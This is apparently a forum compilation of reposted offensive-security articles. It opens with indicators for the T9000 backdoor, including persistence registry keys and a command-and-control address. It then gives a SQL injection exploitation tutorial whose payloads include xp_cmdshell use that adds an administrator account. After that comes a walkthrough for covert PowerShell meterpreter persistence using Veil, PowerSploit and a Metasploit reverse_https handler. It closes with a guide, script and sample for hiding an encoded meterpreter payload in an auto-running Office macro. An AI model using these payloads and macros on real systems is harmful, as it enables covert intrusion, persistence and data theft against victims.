HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run Command and Control 198.55.120[.]143:8080 Sursa: http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

SQL Injection: Exploitation Published on February 9, 2016 By HollyGraceful on Injection, OWASP Top 10, Web Application Security Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise. SQL and a SQL Injection Primer For those less familiar with SQL it is a language used for storing, retrieving, modifying and removing data from a database. It can often also be used to read or modify files on the remote system and execute operating system commands. There are many variations such as Microsoft SQL, MySQL or PostgreSQL. There are different query types in SQL, such as SELECT, INSERT, UPDATE and DELETE as well as the idea of “Stored Procedures”. These are used for retrieving data from the database (SELECT), adding new rows to a table (INSERT), taking a table row and modifying it (UPDATE) or removing rows from a table (DELETE). There are many different stored procedures however an interesting one is the MSSQL procedures xp_cmdshell which can be used for executing commands on the remote database host. SELECT Statements retrieve data from the database and look like: SELECT column FROM table WHERE condition is true For example the following could be used for a login system: SELECT username,password FROM users WHERE username='$INPUT1$' AND password='$INPUT2$'; Where $INPUT1$ and $INPUT2$ is text taken from the user of the application. Statements are separated by semi-colons, so two statements could be “stacked” and executed one after the other by separating them with a semi-colon. Developers can add comments into a statement by preceding the comment with a ” −− ” before the comment, which makes the SQL parser ignore any following text. The above statement concatenates user input into the query and is therefore vulnerable to SQL injection, as an attacker can simply add characters within $INPUT1$ or $INPUT2$ to alter the logic of the statement. Taking this into account an attacker could utilize the following payload for INPUT1 to cause a login bypass: x’ OR 1=1 −− This works as the input would change the command to the following: SELECT username,password FROM users WHERE username='x' OR 1=1 -- ' AND password='$INPUT2$'; As you can see from the above, the double dash has caused the password check to be “commented out” so that it has no effect. Also if you remember back to the first SQL command I showed highlights that the SELECT statement evaluates the WHERE clause to determine if it is a Boolean true. That’s what the OR 1=1 part of the input achieves, as one always equals one. The effect on many applications that are vulnerable to SQL injection in the login form is that all account data will be returned and the database will simply log in the attacker in as the first user in the database. As you can see the attacker has altered the intended logic of the statement and they could use this to bypass authentication, cause the database to leak confidential information or even execute functions such as executing operating system commands. Many times it can be tempting to leave SQL exploitation down to automated tools, but I recommend all juniour Penetration Testers get as deep into manual exploitation as they possible can so that they can really understand what the tool is up to, especially in preparation for the day that the tool fails and you’ve got to crack a can of caffeine and do it all manually. Detecting Vulnerable Functions Detecting SQL injection is fairly simple if errors are enabled and displayed in raw form to the user. If an attacker adds an apostrophe the the input it will cause an unbalanced number of quote marks and an error like “You have an error in your SQL syntax” will be shown, great you have a valid SQL injection point, however if errors are customized or simply not rendered to the user then you have to try a little harder! the most effective way to do this is to alter the query in such a way that it could only possibly be that you have successfully injected into SQL. So very SQL-like syntax being parsed in the expected way. Consider he following query which loads a news article from the database to display on an fictitious web application: SELECT id,title,content FROM tblArticles WHERE id=$input Which is accessed through the following URL: http://sql.example.org/news?id=100 Now a simple way to determine is the parameter “id” is vulnerable to injection would be would be to try the following URLs and see how the server reacts: http://sql.example.org/news?id=100 http://sql.example.org/news?id=101 http://sql.example.org/news?id=101-1 If the server is appropriately vulnerable it would be expected that the first and second URL show different articles whereas the third one is evaluated by the database and produces the same output as the first URL. If the statement 101-1 is not evaluated then there’ll be a notable change in output. The above example, obviously, will only work on integer inputs, if the id parameter was instead a string input like this: http://sql.example.org/news?page=example With the above case it’s possible to utilize string concatenation in a similar way, where if the string is evaluated and concatenated then the output should not change whereas if it is no evaluated then a noticeable change in output will occur. The method of concatenation differs between back-end database types however if one works you have the added benefit of fingerprinting the database type! MSSQL: exa'+'mple With URLs a + is space, use %2b instead (URI encoded plus sign)! MySQL: exa' 'mple (that's a space between two apostrophes) Oracle: exa'||'mple An additional way of detecting of detecting functions that are vulnerable is to concatenate a simple conditional at the end of the input, such as: AND 1=1 -- AND 1=2 -- The idea with these payloads is that the top option of 1=1 will not alter the logic of the query in anyway (as 1 does in fact equal 1) although the second payload will break the query and therefore the application would operate in a noticeably different way, such as missing text on the page (and therefore a shorter content length), a faster response time, a visible error or a different status code. The application should also have the same effect regardless of what the conditional was, so 1=1, 2=2 and 3=3 should all have the same effect, as should payloads such as: AND (SELECT @@version)=(SELECT @@version) -- The above payload is useful because its very SQL-like and whilst there may be some application logic which interprets 1=1 it’s very unlikely that outside of a SQL injection context you’ll get the same response from the above payload. It’s important to note however, that this payload is vendor specific, so the above will work on MSSQL and MySQL but not PostgreSQL. There’s a suitable payload for each of the backends however. The PostgreSQL equivalent would be: AND (SELECT version())=(SELECT version()) -- Types of Injection Whilst the above example is a simple demonstration of SQL and how injection can be use to the benefit of an attacker, as the attacker has the full flexibility of SQL at their disposal there is much more that they can do than simply bypassing an application’s login form. There are different types of injection covered within this article are: Boolean Error Union Stacked Time In terms of injection it’s not exactly a case of preference but simply what is available in the context of the vulnerable parameter. You’ll definitely prefer to find Union or Error based over Boolean and Time based due to the effort levels required to exploit them but you’ll have to deal with what you’re given when it comes down to it. Different injection types will be available depending on the original query which you are injecting into as well as any filters that are in place to prevent malicious input. Exploitation There are five injection types and I’ll cover them each in turn, once you get the hang of the first however the others operate much as you’d expect but I’ll run through a full working example of each to make sure there’s no important details missed out, plus it’ll show how I generate payloads and build up from detection to data exfiltration. Error Based Error-based SQL injection comes about when errors from the SQL database are exposed to the attacker by being embedded in application responses. Detection is generally as simple as placing an apostrophe in the parameter an you’d receive an error along the lines of: Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string The exact error depends on the backend database. These errors can be controlled and by crafting input you can cause the error to contain data from the database itself. For example, if you are injecting into an integer input you can cause a type clash which will disclose information like this: AND 1 in (SELECT @@version) with input like this you’ll get an error along the following lines: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)' to data type int. This works as the database attempts to convert the string to an integer, cannot, and throws an error that reveals the information. This means that an attacker can place any select statement that returns a string within the brackets of the payload and the error will contain the desired output. However it’s a touch more complex if you’re injecting into a string, but only a touch. As you couldn’t cause a cast error by converting to an integer you can expand the payload to be something along these lines: AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) -- Here you can replace (SELECT 1) with the SQL statement you would like to execute and retrieve the contents from. The way that this injection works is to concatenate the desired data onto the end of the string “Extract” and then attempts to cast that to an integer which causes an error, so in the case of the example the resulting error would be: Error Type: Microsoft SQL Native Client (0x80040E07) Conversion failed when converting the varchar value 'Extract:1' to data type int. So an attacker can effective run arbitrary SQL statements and capture the output easily if errors are embedded within the application. If errors are gracefully handled however this doesn’t stop an attacker completely, they just have to use a different injection technique. Union Based The UNION operator allows two or more SELECT statements to be combined, the idea being that a developer may run a query such as listing all of the products available in a store and an attacker can combine this with an additional query, such as listing all of the usernames and passwords in the customers table. To utilise a union though the attacker must request the same number (and type) as the original query and therefore needs to know how many columns are being used. There are two ways to do this, the first is to use NULLs in place of the columns to determine how many columns there are, such as: UNION SELECT NULL -- UNION SELECT NULL, NULL -- UNION SELECT NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL -- …and continue until you’ve determined how many columns there are – if you get the incorrect number of columns an error condition will occur and if you get the right number then the application will run unhindered. You can then swap out the NULL with datatypes to determine which ones are correct, such as: UNION SELECT 'abcd', NULL, NULL, NULL -- UNION SELECT 1, NULL, NULL, NULL -- Work them out one at a time until you end up with something like this: UNION SELECT 1, 'string', 'string', 'string' -- At this point you have a working SELECT statement where the output will be appended to the normal output the application gives! If you’ve got a lot of columns and writing out all of those NULLs is too much like hard work there’s another method of doing the original column count enumeration, using ORDER BYs. If you attempt to order by a column number which is higher than the number of columns it’ll throw an error. So you can start low and work up until you see an error: ORDER BY 1 -- ORDER BY 2 -- ORDER BY 3 -- ORDER BY 4 -- Blind Boolean If the application gracefully errors, and it’s not possible to combine queries with UNION, then an attacker can use inference to determine the answer to queries about the database. The payloads we used earlier to prove the existence of injection are simple examples of this: AND 1=1 -- AND 1=2 -- Essentially these are asking yes or no questions of the database and the result shows the answer. “Does 1=1?” Yes of course it does and therefore the normal output of the application will be visible. “Does 1=2”? No it does not and therefore there should be a noticeable chance, this could be in the response length, time of execution, or HTTP response code (just like before). However we can expand up on this idea to ask more in-depth questions of the database, as long as we can phrase them as Yes/No questions. For example, “Is the first letter of the current user the letter ‘a'”? That’d look something like this: AND SUBSTR(SELECT user_name(), 1, 1)='a' -- We can cycle through: b, c, d, e until we get a “true” response – then move on to the second character and so on. A time consuming and request intensive process but it can be automated quite easily with python (or Burp Intruder!) Time-Based Blind If the application does not embed responses so you can’t use UNION, if it doesn’t show error messages an it’s not possible to determine the output of a boolean then there is still hope! If you can’t infer the output to a boolean through application responses you can add a notable difference yourself through time delays. Effectively using IF statements and delays you can ask the application “Does A=A? If so, please delay your response by five seconds and if not then immediately respond”. Then by detecting lag in the response you’ll get your answer! Simple…but very time consuming… A payload like this will work for MSSQL: IF('a'='a') WAITFOR DELAY '0:0:5' -- Then you can simply replace the ‘a’=’a’ with whatever yes/no question it was that you’d like to ask. Stacked Queries (and possibly command execution!) A final thing which is worth noting, is that it may be possible to close off the developers query and start a completely new query from scratch, something as simple as: ; WAITFOR DELAY '0:0:5'; -- If this works you’ll get a delay as you did in the previous example, however as you’re able to execute new full queries it is also potentially possible to execute stored procedures – such as xp_cmdshell on MSSQL. This stored procedure allows for the execution of operating system commands on the database server. There are two problems. The first problem is, on modern MSSQL servers xp_cmdshell is disabled by default…but you can re-enable it through SQL Injection! The second problem is that to execute this procedure, you probably need to be running as the sa user. If you’re lucky those and you are sa, here’s the steps to execute OS commands: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Now that’s done, you can go ahead and use the xp_cmdshell: exec master..xp_cmdshell 'dir c:\'; -- That’ll execute the dir command! One…small hitch…the output of the command isn’t returned…an easy way to get around that would be to just attack the application blind, for example: exec master..xp_cmdshell 'net user foobar Password123 /add'; -- exec master..xp_cmdshell 'net localgroups "Administrators" /add'; -- The above command adds a new local administrator to the remote server. That might help. Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection! You can create a table and store the output of a command to it with the following: ; create table #output (id int identity(1,1), output nvarchar(255) null); ; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:'; Then to read the contents out with a SELECT statement like this one: ; select * from #output where output is not null order by id; A quick note on filter evasion… If there’s a filter in place to prevent the execution of payloads above then there are a few things to try. First of all be aware that you can flip case without any problem: SELECT sElEcT Also if whitespace is filtered, then you can replace spaces with comments for the same effect: AND 1=1 -- /**/AND/**/1=1/**/-- Finally if you can’t comment out the end of a query you can “gracefully close” the statement instead: ' AND 1=1 -- ' AND 1=1 OR 'a'='a Defending against Injection As I said at the start of this article the issue really is that user input is insecurely concatenated into a query. So there’s two things to note here, the first is concatenation and the fix here is instead to use “parametrized” or “prepared” statements, these are available in all modern languages and frameworks, these effectively separate the query from the user input so that the database cannot mix the two up and effectively stop SQL injection attacks on their own. An example for PHP can be found in the PHP documentation here, which gives a flavour of the general idea. However another thing to consider, to stop other kinds of injection and web application attack, it’s a good idea to consider filtering all user input. I’ve written about user input filtering tactics here. Sursa: https://www.gracefulsecurity.com/sql-injection-exploitation/

How-To: Post-Ex Persistence Scripting with PowerSploit & Veil Many penetration testers within the security industry state that getting a system shell is just the starting point for an attack. Sure, I agree, and quite possibly the most significant tenets of our craft could be post exploitation - specifically, the act of maintaining a persistent connection while remaining intimately covert against defense mechanisms. Historically, the act of evading antivirus and/or malware detection has been a perpetual struggle between those that detect and those that evade. We could use code packing, obfuscating and staged multipart net IO based payloads, to name a few. Enter Microsoft, as they tipped the scales in favor of the evaders by introducing the PowerShell scripting language. The PowerShell language was first introduced as version 1.0 with the advent of Microsoft XP SP2/SP3. Additionally, the PowerShell scripting language, although full-featured, is considered a whitelisted application for the purpose of running various local and/or network based functions; therefore, it remains undetected by antivirus software. A number of well-authored PowerShell tutorials exist on the Internet, providing everything necessary to get underway rather quickly. However, although I vehemently support the pedantic study of programming languages, we don’t really need to touch code to establish an effective piece of PowerShell. To further prove the point, this is a quick post to simply document the necessary steps needed to create a persistent PowerShell communication channel using both the PowerSploit and Veil frameworks. This technique will leverage Veil to generate a PowerShell encoded meterpreter payload. Immediately following, the PowerSploit framework will be used to create a PowerShell wrapper that can be executed on the victim machine in order to maintain the persistent connection. Further information regarding the frameworks used within this post can be referenced here: PowerSploit: https://github.com/mattifestation/PowerSploit Veil: https://github.com/veil-evasion/Veil I would also like to thank my colleague, Dan Kottmann, for his assistance and expertise while debugging code/execution gremlins. Lab Environment The lab environment used to stage this exploitation scenario was comprised of the following three systems, all of which were virtualized guests running within an Ubuntu 12.04 (64 arch) host system. Kali Linux (32 Arch) – Attacking System #1 (Primary) Windows 7 (64 Arch) – Attacking System #2 (Supporting) Windows 7 (32 Arch) – Victim System Additionally, the following diagram illustrates the network architecture and the progression of the attack sequence. The procedure takes into consideration that you have already gained an initial meterpreter shell on the victim system and that we are proceeding with post-exploitation from this point on. First Step – Create meterpreter payload using Veil. Second Step – Place Veil payload into PowerSploit and generate new payload. Third Step – Use the existing meterpreter session to upload the new PowerShell script. Fourth Step – Relax and enjoy the persistent connection. Installing Veil The easiest method to install the Veil framework is to simply perform a “git clone” fromChris Truncer’s GitHub code repository within a Kali Linux operating system. There are specific installation details on his GitHub site, but essentially he provides a “setup.py” script that will install the necessary dependencies. A successfully installed instance of the Veil framework should return something similar to the following screenshot upon typingpython /usr/share/veil/Veil.py. Installing PowerSploit The next step is to download the PowerSploit archive from the GitHub code repository and install it within the Microsoft Windows 7 (64 Arch) attacking system. The following series of commands will provide adequate details for installing the framework. Note that we will need administrative privileges for the following steps. Get the value of the “PSModulePath” environmental variable. C:\Users\labrat>set ---- PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ Decompress the downloaded PowerSploit archive and place it in the previously identified PowerShell Modules directory. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>move C:\Users\labrat\Downloads\PowerSploit-master . 1 dir(s) moved. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>dir Volume in drive C has no label. Volume Serial Number is 0CA4-867A Directory of C:\Windows\System32\WindowsPowerShell\v1.0\Modules 12/04/2013 11:24 AM <DIR> . 12/04/2013 11:24 AM <DIR> .. 12/04/2013 11:18 AM <DIR> PowerSploit-master 07/14/2009 12:32 AM <DIR> PSDiagnostics 07/14/2009 12:37 AM <DIR> TroubleshootingPack 0 File(s) 0 bytes 5 Dir(s) 12,084,989,952 bytes free Enter into the PowerShell scripting environment and set the execution policy to “Unrestricted” so that we can execute our PowerSploit scripts. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules> Set-ExecutionPolicy Unrestricted Finally, import the PowerSploit “Persistence” module and answer “Run” if prompted with a warning. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Import-Module .\Persistence Security Warning Run only scripts that you trust. While scripts from the Internet can be useful, this script can potentially harm your computer. Do you want to run C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence\Persistence.psm1? [D] Do not run [R] Run once Suspend [?] Help (default is "D"): R ---- Generating the Veil Payload The following series of screenshots will provide the details to generate a .bat scriptcontaining an embedded Base64 encoded PowerShell meterpreter payload. Thewindows/meterpreter/reverse_https payload was used during this scenario considering it offers an inherent level of persistence in and of itself while also increasing the probability that an HTTP based payload will be allowed outbound. Also note that thepowershell/VirtualAlloc method is used as it allows for inline shellcode injection. Finally, we are presented with the .bat file containing the Base64 encoded payloads applicable to both 32 and 64 arch types. We need to copy out the entire Base64 value to be used later within PowerSploit. Note that we obviously don’t care which of the Base64 values we copy, since both of the payloads are identical. The wrapper shell script is simply providing the conditional required to identify arch types. Generating the PowerSploit Payload This section is based on Matt Graeber’s PowerSploit article and is well worth the read. The motivation for providing this blog post was to illustrate how to leverage the inclusion of Veil payloads in conjunction with Matt’s technique. Getting back on task, on the Windows 7 (64 Arch) system, we need to ensure that we are still in the PowerShell scripting environment. Again we can enter the environment by typing the following within a privileged command shell and change directory to the location of the PowerShell modules. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Users\labrat> cd C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Now we can create an arbitrary variable and assign the necessary value to it. The following example provides a stub for a variable assignment that can be used by simply plugging in our previously copied Base64 Veil payload. $p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()} The following uses our Veil payload, and represents an actual assignment. We can now set a couple of additional arbitrary variable values that will define both non-privileged and privileged persistence methods, respectively. The first definition will run the persistence script upon each successful logon. The second, considering we have gain privileged access to the victim system, will run the persistence script each day at 10:00 AM. $u = New-UserPersistenceOptions -Registry –AtLogon $e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM' Finally, we need to generate the persistence script using the PowerSploit “Add-Persistence” module. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru This should generate two files outputted to the same directory. The Persistence.ps1 andRemovePersistence.ps1 files should be self-explanatory but are simply used to enable persistence and remove persistence. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> ls Directory: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 12/4/2013 11:19 AM 16025 Add-Persistence.ps1 -a--- 12/4/2013 11:19 AM 5140 New-ElevatedPersistenceOptions.ps1 -a--- 12/4/2013 11:19 AM 3555 New-UserPersistenceOptions.ps1 -a--- 12/4/2013 5:29 PM 7128 Persistence.ps1 -a--- 12/4/2013 11:19 AM 1104 Persistence.psd1 -a--- 12/4/2013 11:19 AM 170 Persistence.psm1 -a--- 12/4/2013 5:29 PM 514 RemovePersistence.ps1 -a--- 12/4/2013 11:19 AM 583 Usage.md Profit After all of this, we are set to actually profit from all of our effort. At this point, the victim system is in a state of initial exploitation as the following screenshot illustrates. We now need to upload our newly generated PowerShell script so that we can maintain persistence. Similar to what we did on the Windows 7 (64 Arch) system, we need to ensure that the victim machine can run PowerShell scripts by explicitly defining the Set-ExecutionPolicy Unrestricted policy. However, if we drop into command shell from within meterpreter, then the only available shell is non-interactive. Fortunately, Microsoft has afforded us the ability to set the policy using a non-interactive method from within the command line. A word of mention, we are using a separate multi-handler during these examples as opposed to the inherent handler invoked for a specific exploit payload. The following configuration was used within a MetaSploit resource script and started from the msfconsole as follows. Save this to a file called reversehttps.rc use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 8443 set ExitOnSession false exploit -j –z Invoke the script using: Msfconsole –r reversehttps.rc Returning to the example, we can now move our new Persistence.ps1 script from the Windows 7 (64 Arch) system over to the Kali Linux system. Then we will use the post-exexec_powershell module to upload our Persistence.ps1 script via the existing meterpreter session as the following screenshot illustrates. The successful execution of the Persistence.ps1 should execute cleanly without returning any syntax errors. Note that the following screenshot had returned multiple meterpreter sessions since the Windows 7 (32 Arch) victim system was rebooted and logged back into.Furthermore, there were multiple instances of the persistence script staged on the victim resulting in the persistent connections. If everything worked correctly, persistence should be working as expected. You can obviously test this in a controlled environment by re-authenticating the victim user, which should invoke a new meterpreter session. The process of removing persistence is as simple as copying the RemovePersistence.ps1script from the Windows 7 (64 Arch) system to the Kali Linux system and running the script using the MetaSploit exec_powershell module. CONTACT INFO Name: Chris Patten Sursa: https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

Embedding Veil Powershell payloads into Office Documents So upon reading Backdoooring Office Documents , I wondered if I could achieve something with one of the Veil-framework Powershell payloads. The end goal being if we had a user on an assessment open and run our macro (which happens more than I would like to admit), we could have a memory resident backdoor that would not get flagged by AV. 1. Veil Payload To start, we would ned to create a Veil (Veil install/documentation) Powershell payload. Upon opening Veil, we’ll just enter: use powershell/VirtualAlloc generate This will start the process for generating our specific Powershell payload. Veil allows for not only msfvenom payloads, but also custom shellcode. Here, we are going to simply use meterpreter/reverse_http. Oh and, in case you were wondering, Veil supports tab completion on the msfvenom payloads! Once the shellcode is generated, we then name our output and take note of its location. Oh and move it to our Office machine 2. Office Macros Now onto embedding the payload into an office document. Open Office, and head to the developer tab, and open the Visual Basic editor: From here, open the payload.bat from Veil in a text editor, and copy the first section (x86) from the word powershell until the end of the first if statement: We will need to create a new Subfunction, “Workbook_Open()”, create two new String objects, “exec” and “str”, and paste this as the string value for “exec” in the VBA pane. Sub Workbook_open() Dim exec As String Dim str As String str = "" exec = "[entire string]" Of course it complains, but this is okay since we will fix this by using string concatenation. Head to the string just after “FromBase64_decrypt” and cut the entire section in between the quotation marks. Insert this string as the “str” value. str="[Value]" The string is still too long! Ok, let’s split it in half and concatenate the string back together one line later: str = "[Value A]" str = str + "[Value B]" Now, we can call the variable “str” in between the the quotation marks: Next, we need to properly escape all the quotations on the line by changing \” to \””. There are occurrences before “Invoke-Express”, and before and after the variable “str”. Finally, we place the entire thing into a Shell(). Our VBA editing is complete. We could continue breaking up the strings and concatenating them back numerous times if need be to make things easy to read or fit into a blog! Below is a copy/paste friendly (read cleaner) template. Also considering how tedious this can be by hand, I wrote a python script, also below, that automates moving this into a vba-friendly output. Template: Sub Workbook_Open() Dim exec As String Dim str As String str = "[half payload value]" str = str + "[half payload value]" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command" exec = exec + " ""Invoke-Expression $(New-Object IO.StreamReader " exec = exec + "($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]" exec = exec + "::FromBase64String(\"" " & payload & " \""))))," exec = exec + "[IO.Compression.CompressionMode]::Decompress))," exec = exec + "[Text.Encoding]::ASCII)).ReadToEnd();"" " Shell(exec) Macro_safe.py: (google drive download here) (new github link here, part of the MacroShop repository) #!/usr/bin/python ##### # macro_safe.py ##### # # Takes Veil powershell batch file and outputs into a text document # macro safe text for straight copy/paste. # import os, sys import re def formStr(varstr, instr): holder = [] str1 = '' str2 = '' str1 = varstr + ' = "' + instr[:54] + '"' for i in xrange(54, len(instr), 48): holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48]) str2 = '"\r\n'.join(holder) str2 = str2 + "\"" str1 = str1 + "\r\n"+str2 return str1 if len(sys.argv) < 2: print "----------------------\n" print " Macro Safe\n" print "----------------------\n" print "\n" print "Takes Veil batch output and turns into macro safe text\n" print "\n" print "USAGE: " + sys.argv[0] + " <input batch> <output text>\n" print "\n" else: fname = sys.argv[1] f = open(fname) lines = f.readlines() f.close() cut = [] for line in lines: #split on else to truncate the back half first = line.split('else') # split on \" cut = first[0].split('\\"', 4) #get rid of everything before powershell cut[0] = cut[0].split('%==x86')[1] cut[0] = cut[0][2:] #get rid of trailing parenthesis cut[2] = cut[2].strip(" ") cut[2] = cut[2][:-1] # for i in range(0,3): # print str(i) + " " +cut top = "Sub Workbook_Open()\r\n" top = top + "Dim str As String\r\n" top = top + "Dim exec As String\r\n" #insert '\r\n' and 'str = str +' every 48 chars after the first 54. payL = formStr("str", str(cut[1])) #double up double quotes, add the rest of the exec string idx = cut[0].index('"') cut[0] = cut[0][:idx] + '"' + cut[0][idx:] cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] +"\"" #insert 'exec = exec +' and '\r\n' every 48 after the first 54. execStr = formStr("exec", str(cut[0])) shell = "Shell(exec)" bottom = "End Sub\r\n\r\n\'---Generated by macro_safe.py by khr040sh---" final = '' final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n" print final try: f = open(sys.argv[2],'w') f.write(final) # python will convert \n to os.linesep f.close() except: print "Error writing file.\n Please check permissions and try again.\nExiting..." sys.exit(1) print "File written to " + sys.argv[2] + " !" Sample output from python code: Sub Workbook_Open() Dim str As String Dim exec As String str = "nVZNj+M2DL3nVwiBDwkmnsrf9gQD7LSLBRYoigIzaA9BsJBleWKsYw" str = str + "e2vJuZtv+94kvo6XYvRS+0RVHk4yNNy9PiXrxbLnbv2/bj8d" str = str + "QPdrX8bIbOtFF4W7Xtcr0Xp6lsGy1Gq6x7mLN1++JjZ3+1g/" str = str + "itGeyk2oe27fXqqvu6EVPTWXG+Pl+uz9f19n/H+Wkwypqng3" str = str + "tUHGe6+v2yEW+Rr2//iH3V/Dv6cfyiB/tfYh/NcTR29b3nOa" str = str + "vlu4XXOyIfqsp/ejkZ4bszpRnem7rpGtv0nfC08H9RRyOWvz" str = str + "ddFC6F37nVeFLaCGg+TJ0my1H4JzWO9jBMC+987/V3d9+QLD" str = str + "fyHEhJj+jyiOV6K3Y/vliz2++9kSrai4dBH8RoWqOtqTbXt6" str = str + "Z7xsadOOepqIf+KOzBiJN6aXtVLT70U1eJMBS6P54cEWVrhO" str = str + "l0X5lhXDxYa44nuLD9Vc0nxdfGHkQgGkebuiTR1xTjh/HQfF" str = str + "ZWfXpWnzrVLL5XiXHS2pjKXJ2MzasRUZKK1ezsXq4XUzc2z5" str = str + "0z0gc1iHKqd3uXpku+Kp3QtROlcqJOnUhCIod0YU4mhRNZTE" str = str + "sSNYnE0JI2NIkyIF3kRE5CkxdJdhE2aBnQUka8NBSjJPo1xa" str = str + "3iWUcmUULuSdQhgyw1GeNExHGxkVOMjERFqBRh1uQvI5MCXi" str = str + "oS5EAqPgb0cF+WjEqSSUTGEb0lGTmgkAW5r8l9TcdS2jUgJ2" str = str + "SGYjoWErSQjgWAVjBXmnQx7EJmIyNoGe0a2k3JXwy4CaPKkD" str = str + "R5NgRcGtYhGVAiEw6J9FE3kIN6IIUk57MJqkpvFe0aVLXkCo" str = str + "J2COzmciZRMYKw4mZAtcI5yzRjmuKMjQMSiuyKiHdRQcCVKT" str = str + "dIHjLPcAoTeInJJEXN0XCaa3RJYe4XjbhABQ5yzi1XDC1T3D" str = str + "lydlWRXQqkFCinZV4z3DjnVFPSRWgQIAUq2ohrrip6A1UFf8" str = str + "gNOpCow9kzBk/BxAJpKLnIipCW9Uwi+SsKjoZlEjPjlyLDC8" str = str + "ENcBb+Yj5R5Ex7nnBcSYGCgikxtCznBkZzBWgGxcdQhRhfcs" str = str + "j8oc2Q4BsRqPnFhIzxdYNYUJKQMCAWb7RRGm4pREOfXqYKTA" str = str + "CS7IqQT+DDBr6czsp8Ro8CaE4LcdFmmC8JnSjQNIQU0wKAYn" str = str + "z7ilFV5CDFeFBMLGbEBXjM6SsIpEXGKp53aRmTFwwekIMeyu" str = str + "a5VmGWKE4fmZuEdZiEeMsrfkOX1CXXCGy86VDQlHRoZfRuRf" str = str + "4whpFvnnLN8WEDCwZUmXDJCoqrS+bqApyWmPcKHZFxtQpMH8" str = str + "y6gOuGZEAnug7DqMYwwgCtGFER4zkMuciYjphNaDOFWQcEGS" str = str + "Mo35gkHeZGmnD18fMKIkYA6pARSnspPNmZfLuo+0GsvOZebr" str = str + "1G+O4fvXI//dufTfdsD36wdtqbm7X4g24O16vL7nJ32a+88+" str = str + "1T7xZRuFrfeM16I9zRndfsNyJYiz9FP1m/m9p2+9fCe8Xd56" str = str + "uLlyNi45039KA7x6NVg/UfW2NOwn80une3B7qaSPk3" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe" exec = exec + "ader ($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro" exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp" exec = exec + "ression.CompressionMode]::Decompress)), [Text.En" exec = exec + "coding]::ASCII)).ReadToEnd();""" Shell(exec) End Sub '---Generated by macro_safe.py by khr040sh--- [EDITED: UPDATED python link] Sursa: https://khr0x40sh.wordpress.com/2014/06/02/embedding-veil-powershell-payloads-into-office-documents/

